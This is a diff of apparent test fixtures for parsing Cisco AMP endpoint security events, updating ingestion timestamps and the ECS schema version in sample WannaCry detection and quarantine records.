@@ -6181,7 +6181,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843726903Z", + "ingested": "2021-09-13T18:07:04.510470729Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6236,7 +6236,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6256,7 +6256,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843728796Z", + "ingested": "2021-09-13T18:07:04.510472598Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6311,7 +6311,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6331,7 +6331,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843730684Z", + "ingested": "2021-09-13T18:07:04.510474450Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6386,7 +6386,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6406,7 +6406,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843732572Z", + "ingested": "2021-09-13T18:07:04.510476347Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6472,7 +6472,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -6502,7 +6502,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843734515Z", + "ingested": "2021-09-13T18:07:04.510478192Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -6570,7 +6570,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -6602,7 +6602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843736405Z", + "ingested": "2021-09-13T18:07:04.510480074Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -6661,7 +6661,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -6691,7 +6691,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843738275Z", + "ingested": "2021-09-13T18:07:04.510481931Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -6744,7 +6744,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6764,7 +6764,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843740157Z", + "ingested": "2021-09-13T18:07:04.510483781Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -6815,7 +6815,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6835,7 +6835,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843765247Z", + "ingested": "2021-09-13T18:07:04.510485650Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6890,7 +6890,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6910,7 +6910,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843776640Z", + "ingested": "2021-09-13T18:07:04.510487525Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6965,7 +6965,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -6985,7 +6985,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843778667Z", + "ingested": "2021-09-13T18:07:04.510489390Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -7044,7 +7044,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7076,7 +7076,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843780555Z", + "ingested": "2021-09-13T18:07:04.510491236Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7133,7 +7133,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7165,7 +7165,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843782466Z", + "ingested": "2021-09-13T18:07:04.510493135Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7222,7 +7222,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7254,7 +7254,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843784355Z", + "ingested": "2021-09-13T18:07:04.510494993Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7311,7 +7311,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7343,7 +7343,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843786245Z", + "ingested": "2021-09-13T18:07:04.510496868Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7400,7 +7400,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7432,7 +7432,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843788123Z", + "ingested": "2021-09-13T18:07:04.510498746Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 